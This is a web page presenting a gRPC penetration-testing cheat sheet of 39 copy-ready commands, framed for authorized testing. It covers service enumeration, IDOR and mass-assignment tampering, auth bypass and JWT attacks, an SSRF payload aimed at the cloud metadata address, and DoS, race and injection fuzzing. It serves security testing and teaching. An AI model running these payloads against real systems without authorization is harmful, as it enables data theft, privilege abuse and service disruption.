gRPC Security Testing Cheat Sheet

gRPC penetration testing reference: server reflection enumeration, grpcurl, protobuf message tampering, TLS/metadata auth testing, and fuzzing protobuf-encoded RPC endpoints. (39 payloads)

Try it interactively with the GraphQL Security Tester

Server Reflection & Discovery

(7)

grpcurl -plaintext target:50051 list

List all services exposed via gRPC server reflection (the v1alpha/v1 ServerReflection service). -plaintext disables TLS for cleartext h2c endpoints.Reflection is the #1 recon win — if enabled, you get the full API surface without a .proto file.

grpcurl -plaintext target:50051 list package.v1.AccountService

List all RPC methods on a specific service discovered from the previous command.Reveals method names like GetAccount, UpdateAccount, DeleteUser

grpcurl -plaintext target:50051 describe package.v1.AccountService.GetAccount

Dump the full method signature: input message type, output message type, and whether it is unary or streaming.describe works on services, methods, and message types

grpcurl -plaintext target:50051 describe .package.v1.GetAccountRequest

Reconstruct the protobuf message schema (field names, types, tags) from reflection so you can craft valid requests.Leading dot = fully-qualified type name

grpcui -plaintext target:50051

Launch grpcui — a Burp-Repeater-style web UI that auto-builds forms from reflection. Best for interactive tampering of discovered methods.Opens a local browser UI; great for non-CLI exploration

grpc_cli ls target:50051 -l

Alternative enumeration with the official gRPC CLI when grpcurl is unavailable; -l gives the long/detailed listing of services and methods.Requires building grpc_cli from the gRPC source tree

buf curl --schema . --reflect=false http://target:50051/package.v1.AccountService/GetAccount

Use buf curl when reflection is DISABLED but you have the .proto files locally — point --schema at your proto dir to drive requests.Fallback path once reflection is locked down (a common 'fix')

Reflection Disabled — Working Blind

(6)

grpcurl -plaintext -proto api.proto target:50051 describe

Drive grpcurl from a local .proto file when reflection returns 'server does not support the reflection API'.Recover .proto files from the mobile/web client, source repo, or CI artifacts first.

protoc --decode_raw < captured_message.bin

Decode a raw protobuf payload with no schema — recovers field tags, wire types, and values. Essential when you only have intercepted bytes.Works on any length-delimited protobuf blob you sniffed off the wire

Search client JS/APK/IPA for *.proto, FileDescriptorProto, or grpc.web service stubs

Web (grpc-web) and mobile clients embed the schema. Decompile the APK (jadx) or grep the JS bundle for generated service descriptors to rebuild the API.grpc-web bundles often contain the full method list in cleartext

grep -aoE '[a-zA-Z0-9_.]+Service' app.bundle.js | sort -u

Mine a grpc-web JavaScript bundle for service class names, then infer method paths of the form /pkg.Service/Method.grpc-web uses POST /pkg.v1.Service/Method with application/grpc-web+proto

Replay a known good request, then brute-force method names with a wordlist of common verbs (Get/List/Create/Update/Delete/Admin*)

With no schema, fuzz the method path component. A valid method returns a protobuf/status response; unknown methods return status 12 UNIMPLEMENTED.Status 12 vs 3/16 cleanly distinguishes 'no such method' from 'bad input/unauthenticated'

Reconstruct messages from protoc --decode_raw output by assigning field tags to a hand-written .proto

Turn decode_raw field numbers/wire types into a synthetic .proto so grpcurl can re-encode tampered values and re-send.Wire type 2 = string/bytes/sub-message, 0 = varint (int/bool/enum)

Invoking & Tampering Messages

(7)

grpcurl -plaintext -d '{"id": 1337}' target:50051 package.v1.AccountService.GetAccount

Invoke a unary method with a JSON-encoded request body (grpcurl maps protobuf JSON to the wire format for you).The core tampering primitive — change any field value and resend

grpcurl -plaintext -d @ target:50051 pkg.v1.Svc.Method <<'EOF'\n{"user_id": "victim-uuid"}\nEOF

Read the request body from stdin (-d @) for large or scripted payloads — useful in loops and fuzzers.@ tells grpcurl to read JSON from stdin

grpcurl -plaintext -d '{"user_id": "OTHER_USER"}' target:50051 pkg.v1.AccountService.GetAccount

Object-level authorization (IDOR/BOLA) test — swap your user_id for another and check if the server returns their data.gRPC has no built-in object-level auth; BOLA is extremely common

grpcurl -plaintext -d '{"role": "ADMIN", "is_admin": true}' target:50051 pkg.v1.UserService.UpdateProfile

Mass-assignment / over-posting: send protobuf fields the client never sets (role, is_admin, balance) and see if the server trusts them.Servers that map the whole message to an ORM entity are vulnerable

grpcurl -plaintext -d '{"amount": -1000}' target:50051 pkg.v1.PaymentService.Transfer

Business-logic abuse via negative/boundary values — protobuf int32/int64 happily carry negatives that the app may not validate.sint/int wire types allow negatives; check refunds, transfers, quantities

grpcurl -plaintext -d '{"items": [{"id":1},{"id":1}, ... ]}' target:50051 pkg.v1.Cart.Bulk

Send oversized repeated fields to probe missing length limits and trigger resource exhaustion or rate-limit bypass via batching.Repeated fields are the gRPC analogue of GraphQL batching attacks

grpcurl -plaintext -d '{}' -max-msg-sz 209715200 target:50051 pkg.v1.Svc.Method

Raise the client max message size (default 4MB) to confirm whether the SERVER also enforces grpc.MaxRecvMsgSize — unbounded servers are a DoS vector.Default 4MB receive limit is often unset on the server

Authentication & Metadata

(7)

grpcurl -plaintext -H 'authorization: Bearer eyJ...' target:50051 pkg.v1.Svc.Method

Attach a bearer token via gRPC metadata (-H). gRPC metadata are HTTP/2 headers — auth almost always rides in the 'authorization' key.Metadata keys are lowercased; binary values use a -bin suffix

grpcurl -plaintext target:50051 pkg.v1.AdminService.DeleteUser

Call a privileged method with NO metadata at all — missing per-method auth interceptors are a classic gRPC flaw (function-level auth bypass).Auth enforced on some interceptors but not others = BFLA

grpcurl -H 'authorization: Bearer <none-alg-jwt>' ... pkg.v1.Svc.Method

Test JWT validation on the metadata token: alg:none, expired exp, swapped kid, or another user's signed token — same JWT attacks as REST.gRPC just passes the token to your own validation code; flaws are app-side

grpcurl -H 'x-user-id: 1' -H 'x-is-admin: true' ... pkg.v1.Svc.Method

Inject trusted-header style metadata. If the gateway is supposed to strip/set identity headers but the backend trusts them, you impersonate users.Common when an Envoy/gRPC gateway forwards identity in custom metadata

grpcurl -H 'cookie: session=...' ... ; or -H 'authorization-bin: <base64>'

Replay session cookies or binary credential metadata. Metadata keys ending in -bin are base64-decoded to raw bytes before transmission.Use -bin for tokens that are raw protobuf/binary, not strings

grpcurl -insecure -d '...' target:443 pkg.v1.Svc.Method

Connect over TLS but skip certificate verification (-insecure) — confirms whether the server requires mutual TLS (mTLS) or accepts any client cert.If -insecure works without a client cert, mTLS is not enforced

grpcurl -cacert ca.pem -cert client.pem -key client.key target:443 list

Supply a client certificate for mTLS-protected services. Test cert pinning, expired/revoked certs, and whether method-level authZ still applies post-mTLS.mTLS authenticates the channel, not the user — authZ can still be broken

Fuzzing & Robustness

(7)

Generate malformed protobuf via mutated --decode_raw output and resend with grpcurl over a synthetic .proto

Fuzz at the message layer: flip field tags, change wire types, send strings where ints are expected, and watch for INTERNAL/unhandled panics.Wire-type confusion frequently crashes hand-rolled parsers

fuzz '{"name": "§FUZZ§"}' against pkg.v1.Svc.Method with an injection wordlist

Treat string fields as injection sinks — SQLi/NoSQLi/command-injection/SSTI payloads ride inside protobuf strings just like JSON.Protobuf is only transport; downstream sinks are still vulnerable

grpcurl -d '{"url":"http://169.254.169.254/latest/meta-data/"}' ... pkg.v1.Fetch.Get

SSRF via a server-side URL/host field carried in a protobuf message — gRPC fetch/webhook/import methods are prime SSRF targets.Cloud metadata, internal gRPC services, and 0.0.0.0 bypasses all apply

Send deeply nested / recursive sub-messages to test recursion and max-message limits

Protobuf allows self-referential message types; deep nesting can exhaust memory or hit stack limits during deserialization (DoS).Analogous to billion-laughs / GraphQL depth attacks

Open a client-stream/bidi method and never half-close; flood with messages

Streaming RPCs hold a connection open — slowloris-style stream abuse and unbounded stream message counts test server back-pressure and timeouts.Check for missing per-stream message caps and idle timeouts

Replay the same idempotent-looking RPC concurrently (race condition)

Fire N parallel identical mutating calls (redeem coupon, withdraw funds) — gRPC servers without locking/idempotency keys are race-prone.HTTP/2 multiplexing makes high-concurrency replay trivial

Map status codes: 3 INVALID_ARGUMENT, 5 NOT_FOUND, 7 PERMISSION_DENIED, 12 UNIMPLEMENTED, 16 UNAUTHENTICATED

Use gRPC status codes as an oracle. 7 vs 5 leaks existence (BOLA enumeration); 16 vs 7 distinguishes authN from authZ failures.Status-code differential is the gRPC equivalent of HTTP 401 vs 403 vs 404

Intercepting & Proxying

(5)

mitmproxy --mode reverse:http://target:50051 --set http2=true

Proxy gRPC through mitmproxy in reverse mode with HTTP/2 enabled to capture and inspect the framed protobuf traffic.gRPC = HTTP/2 + length-prefixed protobuf frames

Burp Suite + 'gRPC/protobuf' support (Inspector) to decode application/grpc bodies

Modern Burp auto-detects protobuf and renders an editable tree, letting you tamper fields in Repeater/Intruder over HTTP/2.Requires Burp HTTP/2 (kettled) support enabled

Point the target client at a grpc-web/Envoy proxy and intercept the cleartext JSON-ish frames

grpc-web transcodes to HTTP/1.1-friendly frames; routing through Envoy or grpcwebproxy exposes traffic to standard web proxies.grpc-web is far easier to intercept than native HTTP/2 gRPC

wireshark: decode_as HTTP2, then 'Protobuf' dissector with loaded .proto for field names

Capture on the wire and load .proto files into Wireshark's Protobuf preferences so frames show named fields instead of raw tags.Set the Protobuf search path to your .proto directory

Force HTTP/1.1 or h2c downgrade and check if a transcoding gateway (grpc-gateway) exposes a REST surface

Many gRPC services sit behind grpc-gateway exposing REST/JSON. Find the JSON endpoints — they may have weaker auth than the gRPC path./v1/users REST often mirrors pkg.v1.UserService gRPC with different controls

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

JWT Attacks Cheat Sheet GraphQL Injection Cheat Sheet OAuth & OIDC Security Cheat Sheet API Security Cheat Sheet

Frequently asked questions

What is the gRPC Security Testing Cheat Sheet?+

It's a quick-reference collection of 39 gRPC Security payloads for testing gRPC Security Testing vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these gRPC Security payloads?+

Copy any payload straight into your authorized test, or use the GraphQL Security Tester to apply them interactively. Only test systems you have explicit permission to assess.

Are these gRPC Security payloads free to use?+

Yes — this cheat sheet and all gRPC Security payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the gRPC Security Testing Cheat Sheet?+

How do I use these gRPC Security payloads?+

Copy any payload straight into your authorized test, or use the GraphQL Security Tester to apply them interactively. Only test systems you have explicit permission to assess.

Are these gRPC Security payloads free to use?+

Yes — this cheat sheet and all gRPC Security payloads are completely free, with no account required. Everything runs in your browser.

gRPC Security Testing Cheat Sheet

Server Reflection & Discovery

Reflection Disabled — Working Blind

Invoking & Tampering Messages

Authentication & Metadata

Fuzzing & Robustness

Intercepting & Proxying

Related Tools

Related Cheat Sheets

Frequently asked questions

gRPC Security Testing Cheat Sheet

Server Reflection & Discovery

Reflection Disabled — Working Blind

Invoking & Tampering Messages

Authentication & Metadata

Fuzzing & Robustness

Intercepting & Proxying

Related Tools

Related Cheat Sheets

Frequently asked questions